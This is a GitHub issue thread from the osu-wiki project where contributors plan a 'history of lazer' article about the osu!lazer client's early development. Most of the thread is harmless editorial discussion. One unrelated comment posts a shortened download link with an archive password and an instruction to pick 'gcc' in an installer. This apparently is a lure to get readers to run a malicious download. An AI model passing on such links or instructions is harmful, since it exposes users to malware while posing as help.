### ISSUE TITLE
adding more info about osu!lazer's history

### ISSUE THREAD

**Issue by warenwakolj** [ppy/osu-wiki#12056]
Hello, my idea is to add more info about the early osu!lazer/next era (which really fascinates me), but i have a few questions, would it be better to mention a more simple explanation on the [page about lazer](https://osu.ppy.sh/wiki/en/Client/Release_stream/Lazer), and make a"history of lazer" page? or its useless, because i do think there's  a lot to mention, like the transitional client (which could probably even have its own page), that one branch by RBRat3 , that includes the osu!next style menu but in the stable client, and more stuff like this?, unless its not needed to mention all these other things

also, on expanding the lazer page would it be interesting to add info on  what caused flyte to be the redesigner for osu!? (i remember reading that flyte was assigned more simple stuff, and then got closer to peppy and ended up getting assigned to redesign the entire osu! game, might need to recheck)

and another question, is it possible to add a link to peppy's blog post about transitional inside of the wiki page if people want to try the client?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by cl8n** [comment]
a separate article for "history of lazer" would be good if you want to go more in-depth about that. everything you mention would fit well in something like that. the current history section on the lazer article is already good depth for its purpose imo

**Comment by warenwakolj** [comment]
> a separate article for "history of lazer" would be good if you want to go more in-depth about that. everything you mention would fit well in something like that. the current history section on the lazer article is already good depth for its purpose imo

should i make it similar to the [history of osu!](https://github.com/ppy/osu-wiki/tree/master/wiki/History_of_osu!) page, so 1 page for each year (starting at 2014), with a main page that sumarizes stuff?
for example located at "/tree/master/wiki/History_of_osu!(lazer)"?

also, do i include info about only lazer, or the new.ppy.sh website is also interesting to add, since the wiki stuff would probably start at 2014

**Comment by cl8n** [comment]
for a specific topic like that, just one article is good for the whole thing. i think something like "history of loved" is a better example to follow

i would not mix together lazer and the new website except where they are actually related in the content of your article but its hard to give more specific advice without seeing what you'll write

**Comment by warenwakolj** [comment]
thanks!
